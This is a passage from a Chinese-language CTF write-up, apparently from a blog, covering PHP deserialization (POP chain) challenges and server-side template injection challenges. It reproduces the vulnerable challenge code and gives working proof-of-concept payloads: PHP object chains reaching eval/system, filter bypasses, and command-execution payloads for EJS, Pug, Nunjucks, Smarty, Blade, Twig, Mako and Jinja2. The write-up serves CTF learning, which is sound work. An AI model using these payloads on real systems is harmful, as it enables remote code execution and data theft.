preg_replace(&#039;\/^O:\\\\d&#043;:&#034;ChronoVault&#034;:4:\/&#039;, &#039;O:11:&#034;ChronoVault&#034;:5:&#039;, $data);<br \/>\necho urlencode($data);<br \/>\n?&gt;<\/p>\n<h3>EZPOP_6<\/h3>\n<p>&lt;?php<br \/>\n\/\/\u7ecf\u5e38\u505a\u590d\u6742\u7684\u94fe\u5b50\u5bf9\u8eab\u4f53\u4e0d\u597d&#xff0c;\u6211\u4eec\u6765\u4e2a\u7b80\u5355\u7684\u5427<br \/>\n$flag &#061; file_get_contents(&#034;\/flag&#034;);<\/p>\n<p>class A {<br \/>\n    public $obj;<\/p>\n<p>    public function __destruct() {<br \/>\n        if (is_object($this-&gt;obj)) {<br \/>\n            echo $this-&gt;obj;<br \/>\n        }<br \/>\n    }<br \/>\n}<\/p>\n<p>class B {<br \/>\n    public $data;<\/p>\n<p>    public function __toString() {<br \/>\n        return $this-&gt;data-&gt;run();<br \/>\n    }<br \/>\n}<\/p>\n<p>class C {<br \/>\n    public $qcctf &#061; &#034;nope&#034;;<\/p>\n<p>    public function run() {<br \/>\n        if ($this-&gt;qcctf &#061;&#061;&#061; &#034;get_flag&#034;) {<br \/>\n            return $GLOBALS[&#039;flag&#039;];<br \/>\n        }<br \/>\n        return &#034;&#034;;<br \/>\n    }<br \/>\n}<\/p>\n<p>highlight_file(__FILE__);<\/p>\n<p>if (isset($_GET[&#039;data&#039;])) {<br \/>\n    $data &#061; str_replace(&#034;flag&#034;, &#034;&#034;, $_GET[&#039;data&#039;]);<br \/>\n    &#064;unserialize($data);<br \/>\n}<br \/>\n?&gt;<\/p>\n<p>\u8fd9\u4e00\u9898\u7684\u94fe\u5b50\u975e\u5e38\u77ed&#xff0c;\u5165\u53e3\u5c31\u5728 A::__destruct()\u3002\u5bf9\u8c61\u9500\u6bc1\u65f6&#xff0c;\u5982\u679c $obj \u8fd8\u662f\u4e00\u4e2a\u5bf9\u8c61&#xff0c;\u5c31\u4f1a\u6267\u884c echo $this-&gt;obj&#xff0c;\u800c echo \u5bf9\u8c61\u65f6\u4f1a\u81ea\u52a8\u89e6\u53d1 __toString()\u3002<\/p>\n<p>\u6240\u4ee5\u7b2c\u4e00\u6b65\u5c31\u662f\u8ba9 A \u7684 $obj \u6307\u5411 B\u3002\u8fd9\u6837\u5728 A::__destruct() \u91cc\u8f93\u51fa B \u5bf9\u8c61\u65f6&#xff0c;\u5c31\u4f1a\u8fdb\u5165 B::__toString()\u3002\u800c B::__toString() \u91cc\u76f4\u63a5\u8c03\u7528\u7684\u662f $this-&gt;data-&gt;run()&#xff0c;\u56e0\u6b64\u518d\u8ba9 B \u7684 $data \u6307\u5411 C \u5bf9\u8c61&#xff0c;\u5c31\u80fd\u7ee7\u7eed\u8fdb\u5165 C::run()\u3002<\/p>\n<p>\u771f\u6b63\u8fd4\u56de flag \u7684\u6761\u4ef6\u5728 C::run() \u91cc&#xff0c;\u53ea\u6709\u5f53 $qcctf &#061;&#061;&#061; &#034;get_flag&#034; \u65f6&#xff0c;\u624d\u4f1a\u8fd4\u56de $GLOBALS[&#039;flag&#039;]\u3002\u5982\u679c\u76f4\u63a5\u628a\u8fd9\u4e2a\u503c\u5199\u6210 get_flag&#xff0c;\u4f20\u53c2\u65f6\u4f1a\u88ab\u5916\u5c42\u7684 str_replace(&#034;flag&#034;, &#034;&#034;, $_GET[&#039;data&#039;]) \u5220\u6389&#xff0c;\u5bfc\u81f4\u53cd\u5e8f\u5217\u5316\u540e\u7684\u5c5e\u6027\u503c\u4e0d\u5bf9\u3002<\/p>\n<p>\u4e0d\u8fc7\u8fd9\u91cc\u7684\u8fc7\u6ee4\u53d1\u751f\u5728 unserialize() \u4e4b\u524d&#xff0c;\u6240\u4ee5\u53ef\u4ee5\u53cd\u8fc7\u6765\u5229\u7528\u8fd9\u4e00\u70b9\u3002\u53ea\u8981\u5148\u628a\u5e8f\u5217\u5316\u4e32\u91cc\u7684 get_flag \u66ff\u6362\u6210 get_flflagag&#xff0c;\u670d\u52a1\u7aef\u5728\u6267\u884c str_replace(&#034;flag&#034;, &#034;&#034;, $_GET[&#039;data&#039;]) \u4e4b\u540e&#xff0c;\u5c31\u4f1a\u628a\u4e2d\u95f4\u90a3\u6bb5 flag \u5220\u6389&#xff0c;\u6700\u7ec8\u8fd8\u539f\u6210\u771f\u6b63\u60f3\u8981\u7684 get_flag\u3002<\/p>\n<p>\u8fd9\u6837\u4e00\u6765&#xff0c;\u6574\u6761\u94fe\u5b50\u5c31\u662f A::__destruct() -&gt; B::__toString() -&gt; C::run()&#xff0c;\u540c\u65f6\u5229\u7528\u524d\u7f6e\u7684\u5b57\u7b26\u4e32\u66ff\u6362\u628a $qcctf \u4fee\u6b63\u56de get_flag&#xff0c;\u6700\u540e\u5c31\u80fd\u6b63\u5e38\u62ff\u5230 flag\u3002<\/p>\n<p>POC<\/p>\n<p>&lt;?php<br \/>\nclass A {<br \/>\n    public $obj;<br \/>\n}<\/p>\n<p>class B {<br \/>\n    public $data;<br \/>\n}<\/p>\n<p>class C {<br \/>\n    public $qcctf &#061; &#034;get_flag&#034;;<br \/>\n}<\/p>\n<p>$a &#061; new A();<br \/>\n$b &#061; new B();<br \/>\n$c &#061; new C();<br \/>\n$b-&gt;data &#061; $c;<br \/>\n$a-&gt;obj &#061; $b;<br \/>\n$poc &#061; serialize($a);<br \/>\n$data &#061; str_replace(&#034;flag&#034;,&#034;flflagag&#034; , $poc);<br \/>\necho $data;<\/p>\n<p>?&gt;<\/p>\n<h3>EZPOP_7<\/h3>\n<p>&lt;?php<br \/>\nclass Vault {<br \/>\n    public $name;<br \/>\n    protected $id;<br \/>\n    private $age;<\/p>\n<p>    public function setAge($age) {<br \/>\n        $this-&gt;age &#061; $age;<br \/>\n    }<\/p>\n<p>    public function getAge() {<br \/>\n        return $this-&gt;age;<br \/>\n    }<\/p>\n<p>    public function __invoke($id) {<br \/>\n        $name &#061; $this-&gt;id;<br \/>\n        $name-&gt;name &#061; $id;<br \/>\n        $name-&gt;age &#061; $this-&gt;name;<br \/>\n    }<br \/>\n}<\/p>\n<p>class VaultA extends Vault {<br \/>\n    public function __destruct() {<br \/>\n        echo file_get_contents(&#039;\/secret.txt&#039;);<br \/>\n    }<br \/>\n}<\/p>\n<p>class VaultB extends Vault {<br \/>\n    public function __set($key, $value) {<br \/>\n        $this-&gt;name &#061; $value;<br \/>\n    }<br \/>\n}<\/p>\n<p>class VaultC extends Vault {<br \/>\n    public function __check($age) {<br \/>\n        $mix &#061; serialize([$this-&gt;getAge(), $this-&gt;name]);<br \/>\n        if (stripos($mix, &#034;flag&#034;) !&#061;&#061; false) {<br \/>\n            die(&#034;Hacker!&#034;);<br \/>\n        }<br \/>\n    }<\/p>\n<p>    public function __wakeup() {<br \/>\n        $age &#061; $this-&gt;getAge();<br \/>\n        $name &#061; $this-&gt;id;<br \/>\n        $name-&gt;setAge($age);<br \/>\n        $name($this);<br \/>\n    }<br \/>\n}<\/p>\n<p>class VaultD extends Vault {<br \/>\n    public $token &#061; &#034;none&#034;;<\/p>\n<p>    public function __invoke($obj) {<br \/>\n        if (isset($obj-&gt;token) &amp;&amp; $obj-&gt;token &#061;&#061;&#061; &#034;QCCTFyyds&#034;) {<br \/>\n            if (is_string($obj-&gt;name) &amp;&amp; stripos($obj-&gt;name, &#034;flag&#034;) &#061;&#061;&#061; false) {<br \/>\n                eval($obj-&gt;name);<br \/>\n            }<br \/>\n        }<br \/>\n    }<br \/>\n}<\/p>\n<p>function is_printable($s) {<br \/>\n    for ($i &#061; 0; $i &lt; strlen($s); $i&#043;&#043;) {<br \/>\n        if (!(ord($s[$i]) &gt;&#061; 32 &amp;&amp; ord($s[$i]) &lt;&#061; 125)) {<br \/>\n            return false;<br \/>\n        }<br \/>\n    }<br \/>\n    return true;<br \/>\n}<\/p>\n<p>highlight_file(__FILE__);<\/p>\n<p>if (isset($_GET[&#039;data&#039;])) {<br \/>\n    $data &#061; $_GET[&#039;data&#039;];<br \/>\n    if (!is_printable($data)) {<br \/>\n        die(&#034;Nope&#034;);<br \/>\n    }<br \/>\n    $obj &#061; &#064;unserialize($data);<br \/>\n    if (!($obj instanceof VaultC)) {<br \/>\n        die(&#034;Nope&#034;);<br \/>\n    }<br \/>\n}<br \/>\n?&gt;<\/p>\n<p>\u8fd9\u4e00\u9898\u5148\u770b\u5bf9\u53ef\u63a7 GET \u53d8\u91cf data \u7684\u9650\u5236\u3002\u7b2c\u4e00\u5c42\u9650\u5236\u662f&#xff1a;<\/p>\n<p>$data &#061; $_GET[&#039;data&#039;];<br \/>\nif (!is_printable($data)) {<br \/>\n    die(&#034;Nope&#034;);<br \/>\n}<\/p>\n<p>is_printable() \u4f1a\u9010\u5b57\u8282\u68c0\u67e5\u4f20\u5165\u5b57\u7b26\u4e32&#xff0c;\u8981\u6c42\u6240\u6709\u5b57\u7b26\u90fd\u843d\u5728 ASCII 32 \u5230 125 \u4e4b\u95f4\u3002\u95ee\u9898\u5728\u4e8e&#xff0c;PHP \u5e8f\u5217\u5316 protected \u548c private \u5c5e\u6027\u65f6&#xff0c;\u4f1a\u81ea\u52a8\u5728\u5c5e\u6027\u540d\u91cc\u63d2\u5165\u4e0d\u53ef\u89c1\u7684\u7a7a\u5b57\u8282 \\\\x00\u3002\u8fd9\u4e2a\u5b57\u7b26\u7684 ASCII \u662f 0&#xff0c;\u663e\u7136\u8fc7\u4e0d\u4e86 is_printable()\u3002<\/p>\n<p>\u7ed5\u8fc7\u70b9\u5c31\u5728 PHP \u53cd\u5e8f\u5217\u5316\u5bf9\u5927\u5199 S \u7684\u5904\u7406\u4e0a\u3002\u666e\u901a\u5b57\u7b26\u4e32\u662f\u5c0f\u5199 s&#xff0c;\u91cc\u9762\u653e\u7684\u662f\u771f\u5b9e\u5b57\u8282&#xff1b;\u5982\u679c\u628a\u5b83\u6539\u6210\u5927\u5199 S&#xff0c;\u5c31\u53ef\u4ee5\u5728\u5b57\u7b26\u4e32\u5185\u5bb9\u91cc\u4f7f\u7528\u8f6c\u4e49\u5f62\u5f0f\u3002\u4e5f\u5c31\u662f\u8bf4&#xff0c;\u539f\u672c\u4f1a\u51fa\u73b0\u7a7a\u5b57\u8282\u7684\u5c5e\u6027\u540d\u53ef\u4ee5\u4ece s:5:&#034;\\\\x00*\\\\x00id&#034; \u6539\u5199\u6210 S:5:&#034;\\\\00*\\\\00id&#034;&#xff0c;\u8fd9\u6837\u4f20\u8f93\u65f6\u770b\u5230\u7684\u90fd\u662f\u53ef\u89c1\u5b57\u7b26&#xff0c;\u4f46\u53cd\u5e8f\u5217\u5316\u65f6 PHP \u4f1a\u628a \\\\00 \u8fd8\u539f\u56de\u771f\u6b63\u7684 \\\\x00\u3002<\/p>\n<p>\u7b2c\u4e8c\u5c42\u9650\u5236\u662f&#xff1a;<\/p>\n<p>$obj &#061; &#064;unserialize($data);<br \/>\nif (!($obj instanceof VaultC)) {<br \/>\n    die(&#034;Nope&#034;);<br \/>\n}<\/p>\n<p>\u8fd9\u8bf4\u660e\u6700\u5916\u5c42\u5165\u53e3\u5bf9\u8c61\u5fc5\u987b\u662f VaultC&#xff0c;\u6240\u4ee5\u6574\u6761\u94fe\u5b50\u5fc5\u987b\u4ece VaultC::__wakeup() \u8d77\u3002<\/p>\n<p>\u518d\u770b\u7ec8\u70b9&#xff0c;\u771f\u6b63\u7684\u5371\u9669\u70b9\u5728 VaultD::__invoke() \u91cc\u7684 eval()&#xff1a;<\/p>\n<p>if (isset($obj-&gt;token) &amp;&amp; $obj-&gt;token &#061;&#061;&#061; &#034;QCCTFyyds&#034;) {<br \/>\n    if (is_string($obj-&gt;name) &amp;&amp; stripos($obj-&gt;name, &#034;flag&#034;) &#061;&#061;&#061; false) {<br \/>\n        eval($obj-&gt;name);<br \/>\n    }<br \/>\n}<\/p>\n<p>\u8fd9\u91cc\u8981\u6c42\u4f20\u5165\u7684\u5bf9\u8c61\u540c\u65f6\u6ee1\u8db3\u4e09\u4e2a\u6761\u4ef6&#xff1a;\u4e00\u662f\u6709 token \u5c5e\u6027\u4e14\u503c\u4e25\u683c\u7b49\u4e8e QCCTFyyds&#xff0c;\u4e8c\u662f name \u5fc5\u987b\u662f\u5b57\u7b26\u4e32&#xff0c;\u4e09\u662f name \u91cc\u4e0d\u80fd\u76f4\u63a5\u51fa\u73b0 flag\u3002\u6240\u4ee5\u6211\u4eec\u6700\u7ec8\u8981\u63a7\u5236\u7684\u5176\u5b9e\u5c31\u662f VaultC \u5bf9\u8c61\u672c\u8eab&#xff0c;\u8ba9\u5b83\u62e5\u6709&#xff1a;<\/p>\n<ul>\n<li>$id &#061; new VaultD()<\/li>\n<li>$token &#061; \u201cQCCTFyyds\u201d<\/li>\n<li>$name &#061; \u201csystem(\u2018cat \/fla*\u2019);\u201d<\/li>\n<\/ul>\n<p>\u4e4b\u6240\u4ee5\u628a\u547d\u4ee4\u5199\u6210 cat \/fla*&#xff0c;\u662f\u56e0\u4e3a stripos($obj-&gt;name, &#034;flag&#034;) &#061;&#061;&#061; false \u4f1a\u62e6\u622a\u76f4\u63a5\u51fa\u73b0\u7684 flag&#xff0c;\u4f46\u901a\u914d\u7b26\u5f62\u5f0f\u4e0d\u5305\u542b\u8fde\u7eed\u7684 flag \u5b57\u6837&#xff0c;\u4f9d\u7136\u53ef\u4ee5\u5339\u914d\u5230\u76ee\u6807\u6587\u4ef6\u3002<\/p>\n<p>\u89e6\u53d1\u94fe\u4e5f\u5f88\u76f4\u63a5\u3002VaultC::__wakeup() \u91cc\u5148\u53d6\u51fa $this-&gt;id \u8d4b\u7ed9 $name&#xff0c;\u7136\u540e\u6267\u884c&#xff1a;<\/p>\n<p>$name($this);<\/p>\n<p>\u5982\u679c\u8ba9 $this-&gt;id \u6307\u5411 VaultD \u5bf9\u8c61&#xff0c;\u90a3\u4e48\u8fd9\u91cc\u5c31\u4f1a\u89e6\u53d1 VaultD::__invoke()&#xff0c;\u800c\u4f20\u8fdb\u53bb\u7684\u53c2\u6570\u6b63\u662f\u5f53\u524d\u8fd9\u4e2a VaultC \u5bf9\u8c61\u672c\u8eab\u3002\u8fd9\u6837 VaultD::__invoke() \u770b\u5230\u7684 $obj \u5c31\u6b63\u597d\u662f\u6211\u4eec\u4f2a\u9020\u597d\u7684 VaultC\u3002<\/p>\n<p>\u6240\u4ee5\u8fd9\u9898\u5176\u5b9e\u4e0d\u9700\u8981\u7ed5\u8fdc\u94fe&#xff0c;\u6700\u77ed\u5229\u7528\u8def\u5f84\u5c31\u662f&#xff1a;VaultC::__wakeup() -&gt; VaultD::__invoke() -&gt; eval()\u3002\u96be\u70b9\u4e0d\u5728\u94fe\u5b50&#xff0c;\u800c\u5728\u4e24\u4e2a\u9650\u5236\u6761\u4ef6&#xff1a;\u4e00\u662f\u5165\u53e3\u5bf9\u8c61\u5fc5\u987b\u662f VaultC&#xff0c;\u4e8c\u662f protected \u5c5e\u6027\u540d\u91cc\u7684\u7a7a\u5b57\u8282\u8981\u9760\u5927\u5199 S \u548c \\\\00 \u7ed5\u8fc7 is_printable()\u3002<\/p>\n<p>POC<\/p>\n<p>&lt;?php<br \/>\nclass VaultC {<br \/>\n    public $name &#061; &#034;system(&#039;cat \/fla*&#039;);&#034;;<br \/>\n    protected $id;<\/p>\n<p>    public function __construct() {<br \/>\n        $this-&gt;id &#061; new VaultD();<br \/>\n    }<br \/>\n}<\/p>\n<p>class VaultD {}<\/p>\n<p>$a &#061; new VaultC();<br \/>\n$a-&gt;token &#061; &#034;QCCTFyyds&#034;;<br \/>\necho urlencode(serialize($a));<\/p>\n<p>\u5148\u751f\u6210\u666e\u901a\u5e8f\u5217\u5316\u4e32&#xff0c;\u518d\u628a\u5176\u4e2d\u8868\u793a protected \u5c5e\u6027\u540d\u7684\u8fd9\u4e00\u6bb5&#xff1a;<\/p>\n<p>s:5:&#034;%00*%00id&#034;<\/p>\n<p>\u6539\u6210&#xff1a;<\/p>\n<p>S:5:&#034;\\\\00*\\\\00id&#034;<\/p>\n<p>\u4e5f\u5c31\u662f\u628a\u5c0f\u5199 s \u6539\u6210\u5927\u5199 S&#xff0c;\u540c\u65f6\u628a %00 \u6539\u6210 %5C00&#xff0c;\u8fd9\u6837\u5c31\u80fd\u5728\u4fdd\u6301\u5168\u4e32\u53ef\u6253\u5370\u7684\u524d\u63d0\u4e0b&#xff0c;\u8ba9\u53cd\u5e8f\u5217\u5316\u65f6\u8fd8\u539f\u51fa\u771f\u6b63\u7684 protected \u5c5e\u6027\u540d\u3002<\/p>\n<h3>EZPOP_8<\/h3>\n<p>&lt;?php<br \/>\nerror_reporting(0);<\/p>\n<p>final class StarRailCabin {<br \/>\n    public $crewBadge;<br \/>\n    public $catDoor;<br \/>\n    public $needle;<br \/>\n    public $haystack;<\/p>\n<p>    public function __destruct() {<br \/>\n        if (isset($this-&gt;needle)) {<br \/>\n            $n &#061; (string)$this-&gt;needle;<br \/>\n            if (strlen($n) &gt; 5 || !is_numeric($n) || $n &lt;&#061; 999999) die(&#034;\u4f60\u884c\u4e0d\u884c\u5440&#xff1f;&#034;);<br \/>\n            $gate &#061; $this-&gt;catDoor;<br \/>\n            $gate-&gt;partner &#061; &#034;QingCen&#034;;<br \/>\n        }<br \/>\n    }<br \/>\n}<\/p>\n<p>final class CatCafeGate {<br \/>\n    public $fortuneTeller;<br \/>\n    public $sparkler;<\/p>\n<p>    public function __set($name, $value) {<br \/>\n        $oracle &#061; $this-&gt;fortuneTeller;<br \/>\n        if ($oracle() &#061;&#061;&#061; &#034;QingCen&#034;) {<br \/>\n            $engine &#061; $this-&gt;sparkler;<br \/>\n            $engine();<br \/>\n        }<br \/>\n    }<br \/>\n}<\/p>\n<p>final class KleeFirework {<br \/>\n    public $spell;<br \/>\n    public $scroll;<\/p>\n<p>    public function __invoke() {<br \/>\n        $cast &#061; $this-&gt;spell;<br \/>\n        $words &#061; $this-&gt;scroll;<br \/>\n        $cast($words);<br \/>\n    }<br \/>\n}<\/p>\n<p>final class QingCen {<br \/>\n    public static function echo_name() {<br \/>\n        return &#034;QingCen&#034;;<br \/>\n    }<br \/>\n}<\/p>\n<p>highlight_file(__FILE__);<\/p>\n<p>$payload &#061; $_GET[&#034;data_qc.bz2&#034;];<br \/>\nif (isset($payload)) {<br \/>\n    unserialize($payload);<br \/>\n} else {<br \/>\n    echo &#034;\u4e0a\u4f20\u7c7b\u578b\u4e0d\u5bf9\u54e6&#034;;<br \/>\n}<br \/>\n?&gt;<br \/>\n\u4e0a\u4f20\u7c7b\u578b\u4e0d\u5bf9\u54e6<\/p>\n<p>\u8fd9\u4e00\u9898\u7684\u5165\u53e3\u8fd8\u662f\u5728 StarRailCabin::__destruct()\u3002\u53ea\u8981 $needle \u88ab\u8bbe\u7f6e\u8fc7&#xff0c;\u5c31\u4f1a\u5148\u628a\u5b83\u5f3a\u8f6c\u6210\u5b57\u7b26\u4e32\u8d4b\u7ed9 $n&#xff0c;\u7136\u540e\u68c0\u67e5\u4e09\u4e2a\u6761\u4ef6&#xff1a;\u957f\u5ea6\u4e0d\u80fd\u5927\u4e8e 5&#xff0c;\u5fc5\u987b\u662f\u6570\u5b57&#xff0c;\u800c\u4e14\u6570\u503c\u8981\u5927\u4e8e 999999\u3002<\/p>\n<p>\u8fd9\u51e0\u4e2a\u6761\u4ef6\u653e\u5728\u4e00\u8d77\u770b&#xff0c;\u5176\u5b9e\u662f\u5728\u903c\u6211\u4eec\u6784\u9020\u4e00\u4e2a\u770b\u8d77\u6765\u957f\u5ea6\u4e0d\u8d85\u8fc7 5&#xff0c;\u4f46\u6570\u503c\u6bd4\u8f83\u65f6\u53c8\u80fd\u5927\u4e8e 999999 \u7684\u503c&#xff0c;\u53ef\u4ee5\u7528\u79d1\u5b66\u8bb0\u6570\u6cd5\u7ed5\u8fc7\u3002\u540e\u9762\u4e00\u65e6\u901a\u8fc7\u68c0\u67e5&#xff0c;\u5c31\u4f1a\u6267\u884c $gate-&gt;partner &#061; &#034;QingCen&#034;&#xff0c;\u800c partner \u5728 CatCafeGate \u91cc\u5e76\u4e0d\u5b58\u5728&#xff0c;\u6240\u4ee5\u8fd9\u91cc\u4f1a\u89e6\u53d1 CatCafeGate::__set()\u3002<\/p>\n<p>\u8fdb\u5165 CatCafeGate::__set() \u4e4b\u540e&#xff0c;\u5148\u53d6\u51fa $this-&gt;fortuneTeller \u8d4b\u7ed9 $oracle&#xff0c;\u7136\u540e\u6267\u884c $oracle()\u3002\u56e0\u6b64\u8fd9\u91cc\u9700\u8981\u8ba9 $fortuneTeller \u662f\u4e00\u4e2a\u53ef\u8c03\u7528\u5bf9\u8c61\u6216\u53ef\u8c03\u7528\u5f62\u5f0f&#xff0c;\u5e76\u4e14\u8fd4\u56de\u503c\u6b63\u597d\u7b49\u4e8e QingCen\u3002\u6761\u4ef6\u6210\u7acb\u540e&#xff0c;\u53c8\u4f1a\u7ee7\u7eed\u53d6\u51fa $this-&gt;sparkler \u8d4b\u7ed9 $engine&#xff0c;\u518d\u6267\u884c $engine()\u3002<\/p>\n<p>\u8fd9\u8bf4\u660e $sparkler \u4e5f\u5fc5\u987b\u662f\u4e00\u4e2a\u53ef\u8c03\u7528\u5bf9\u8c61&#xff0c;\u6240\u4ee5\u6700\u81ea\u7136\u7684\u505a\u6cd5\u5c31\u662f\u653e\u4e00\u4e2a KleeFirework \u5bf9\u8c61\u3002\u56e0\u4e3a KleeFirework \u5b9e\u73b0\u4e86 __invoke()&#xff0c;\u5bf9\u8c61\u51fd\u6570\u8c03\u7528\u65f6\u4f1a\u8fdb\u5165 KleeFirework::__invoke()&#xff0c;\u7136\u540e\u53d6\u51fa $spell \u548c $scroll&#xff0c;\u6267\u884c $cast($words)\u3002<\/p>\n<p>\u6240\u4ee5\u6700\u540e\u7684\u5229\u7528\u70b9\u5c31\u5728\u8fd9\u91cc&#xff1a;\u628a $spell \u8bbe\u6210\u4e00\u4e2a\u53ef\u8c03\u7528\u51fd\u6570&#xff0c;\u628a\u771f\u6b63\u8981\u6267\u884c\u7684\u5185\u5bb9\u653e\u8fdb $scroll&#xff0c;\u8fd9\u6837\u6574\u6761\u94fe\u5b50\u5c31\u4f1a\u53d8\u6210 StarRailCabin::__destruct() -&gt; CatCafeGate::__set() -&gt; KleeFirework::__invoke() -&gt; $cast($words)\u3002<\/p>\n<p>\u8fd9\u4e00\u9898\u8fd8\u6709\u4e00\u4e2a\u989d\u5916\u7684\u5751&#xff0c;\u4e0d\u5728\u5bf9\u8c61\u94fe\u672c\u8eab&#xff0c;\u800c\u5728\u53c2\u6570\u540d\u3002\u6e90\u7801\u91cc\u53d6\u7684\u662f $_GET[&#034;data_qc.bz2&#034;]&#xff0c;\u4f46 PHP \u89e3\u6790 GET \u53c2\u6570\u540d\u65f6&#xff0c;\u7a7a\u683c\u3001 . \u548c [ \u90fd\u4f1a\u53c2\u4e0e\u7279\u6b8a\u5904\u7406\u3002\u6b63\u5e38\u76f4\u63a5\u4f20 data_qc.bz2&#061;&#8230; \u7684\u8bdd&#xff0c;\u53c2\u6570\u540d\u91cc\u7684 . \u4f1a\u88ab\u8f6c\u6362\u6210 _&#xff0c;\u6700\u540e\u8fdb\u5230 $_GET \u91cc\u7684\u952e\u540d\u5c31\u4e0d\u662f\u6e90\u7801\u91cc\u8981\u53d6\u7684\u90a3\u4e2a\u4e86\u3002<\/p>\n<p>\u89e3\u51b3\u529e\u6cd5\u5c31\u662f\u628a\u4f20\u5165\u7684\u53d8\u91cf\u540d\u5199\u6210 data[qc.bz2\u3002\u539f\u56e0\u662f PHP \u5728\u89e3\u6790\u53c2\u6570\u540d\u65f6&#xff0c;\u4e00\u65e6\u9047\u5230 [&#xff0c;\u5c31\u4f1a\u628a\u5b83\u5f53\u6210\u6570\u7ec4\u8bed\u6cd5\u7684\u5f00\u59cb&#xff0c;\u8fd9\u6837\u540e\u9762\u7684 . \u5c31\u4e0d\u4f1a\u518d\u88ab\u8f6c\u6362\u6389\u3002\u4e5f\u5c31\u662f\u8bf4&#xff0c;\u9898\u76ee\u867d\u7136\u4ee3\u7801\u91cc\u5199\u7684\u662f $_GET[&#034;data_qc.bz2&#034;]&#xff0c;\u4f46\u771f\u6b63\u4f20\u53c2\u65f6\u8981\u7528 data[qc.bz2 \u8fd9\u4e2a\u540d\u5b57\u53bb\u5361\u4f4f PHP \u7684\u53c2\u6570\u540d\u89e3\u6790\u89c4\u5219\u3002<\/p>\n<p>POC<\/p>\n<p>&lt;?php<br \/>\nfinal class StarRailCabin {<br \/>\n    public $catDoor;<br \/>\n    public $needle &#061; &#034;5e555&#034;;<br \/>\n}<\/p>\n<p>final class CatCafeGate {<br \/>\n    public $fortuneTeller;<br \/>\n}<\/p>\n<p>final class KleeFirework {<br \/>\n    public $spell &#061; &#034;system&#034;;<br \/>\n    public $scroll &#061; &#034;cat \/flag;&#034;;<br \/>\n}<\/p>\n<p>$s &#061; new StarRailCabin();<br \/>\n$c &#061; new CatCafeGate();<br \/>\n$k &#061; new KleeFirework();<br \/>\n$c-&gt;fortuneTeller &#061; $k;<br \/>\n$s-&gt;catDoor &#061; $c;<br \/>\necho serialize($s);<\/p>\n<p>?&gt;<\/p>\n<h3>EZSSTI<\/h3>\n<p>Node.js \u7684&#xff0c;&lt;%&#061; 7*7 %&gt; \u68c0\u6d4b\u8fd4\u56de 49 &#xff0c;\u662f EJS \u5f15\u64ce&#xff0c;\u76f4\u63a5\u8bfb&lt;%&#061; global.process.mainModule.require(&#039;child_process&#039;).execSync(&#039;cat \/flag&#039;) %&gt;\u3002<\/p>\n<h3>EZSSTI_1<\/h3>\n<p>\u8fd8\u662f Node.js &#xff0c;#{7*7} \u8fd4\u56de 49 &#xff0c;\u662f Pug  \u5f15\u64ce&#xff0c;#{global.process.mainModule.require(&#039;child_process&#039;).execSync(&#039;cat \/flag&#039;)} \u8fd9\u91cc\u9700\u8981\u67e5\u770b\u6e90\u4ee3\u7801\u627e\u5230 flag \u3002<\/p>\n<h3>EZSSTI_2<\/h3>\n<p>\u662f Nunjucks &#xff0c;{{&#034;&#034;.constructor.constructor(&#034;return this.process.mainModule.require(&#039;child_process&#039;).execSync(&#039;cat \/flag&#039;).toString()&#034;)()}} \u3002<\/p>\n<h3>EZSSTI_3<\/h3>\n<p>\u7528 whatweb \u770b\u4e00\u4e0b\u662f php \u7684&#xff0c;\u6d4b\u8bd5\u662f Smarty &#xff0c;{system(&#039;cat \/flag&#039;)} \u3002<\/p>\n<h3>EZSSTI_4<\/h3>\n<p>\u8fd8\u662f php \u7684&#xff0c;Blade \u7684&#xff0c;&#064;php   system(&#034;cat \/flag&#034;); &#064;endphp \u3002<\/p>\n<h3>EZSSTI_5<\/h3>\n<p>\u8fd8\u662f php &#xff0c;Twig \u7684&#xff0c;{{_self.env.registerUndefinedFilterCallback(&#034;system&#034;)}}{{_self.env.getFilter(&#034;cat \/flag&#034;)}} \u3002<\/p>\n<h3>EZSSTI_6<\/h3>\n<p>\u7ecf\u8fc7\u6d4b\u8bd5\u53d1\u73b0\u662f Mako \u3002${__import__(&#039;os&#039;).popen(&#039;cat \/flag&#039;).read()} \u3002<\/p>\n<h3>EZSSTI_7<\/h3>\n<p>\u7ecf\u8fc7\u6d4b\u8bd5\u53d1\u73b0\u662f Jinja2 \u3002{{&#034;&#034;.__class__.__bases__[0].__subclasses__()}} \u8fd4\u56de\u7684\u6709\u8fc7\u6ee4&#xff0c;\u67e5\u770b\u6e90\u4ee3\u7801\u627e\u5230\u8fd4\u56de\u7684&#xff0c;\u7528\u811a\u672c\u627e\u5230os._wrap_close \u662f\u7b2c141\u4e2a&#xff0c;\u6240\u4ee5{{&#034;&#034;.__class__.__bases__[0].__subclasses__()[141].__init__.__globals__[&#039;popen&#039;](&#039;cat \/flag&#039;).read()}}\u3002<\/p>\n<h3>EZSSTI_8<\/h3>\n<p>\u8fd8\u662f Jinja2\u3002\u8fd8\u7528\u4e0a\u4e00\u9898\u7684&#xff0c;{{&#034;&#034;.__class__.__bases__[0].__subclasses__()[141].__init__.__globals__[&#039;popen&#039;](&#039;cat \/flag&#039;).read()}}\u3002<\/p>\n<h3>EZSSTI_9<\/h3>\n<p>\u8fd8\u80fd\u51fa&#xff0c;{{&#034;&#034;.__class__.__bases__[0].__subclasses__()[141].__init__.__globals__[&#039;popen&#039;](&#039;cat \/flag&#039;).read()}}\u3002<\/p>\n<h3>EZSSTI_10<\/h3>\n<p>\u6709\u8fc7\u6ee4&#xff0c;\u5199\u4e2a\u811a\u672c\u770b\u770b\u3002<\/p>\n<p>import requests<\/p>\n<p>url &#061; &#034;http:\/\/docker.qingcen.net:41803\/?id&#061;&#034;<\/p>\n<p>tests &#061; [<br \/>\n    &#034;{{7*7}}&#034;,<br \/>\n    &#034;__class__&#034;,<br \/>\n    &#034;__base__&#034;,<br \/>\n    &#034;__subclasses__&#034;,<br \/>\n    &#034;__globals__&#034;,<br \/>\n    &#034;popen&#034;,<br \/>\n    &#034;os&#034;,<br \/>\n    &#034;import&#034;,<br \/>\n    &#034;eval&#034;,<br \/>\n    &#034;builtins&#034;,<br \/>\n    &#034;cat&#034;,<br \/>\n    &#034;\/flag&#034;,<br \/>\n    &#034;self&#034;,<br \/>\n    &#034;session&#034;,<br \/>\n    &#034;lipsum&#034;,<br \/>\n    &#034;cycler&#034;,<br \/>\n    &#034;namespace&#034;,<br \/>\n    &#034;Joiner&#034;,<br \/>\n    &#034;get_flashed_messages&#034;,<br \/>\n]<\/p>\n<p>def check(keyword):<br \/>\n    payload &#061; &#034;{{&#034; &#043; keyword &#043; &#034;}}&#034;<\/p>\n<p>    try:<br \/>\n        r &#061; requests.get(<br \/>\n            url &#043; 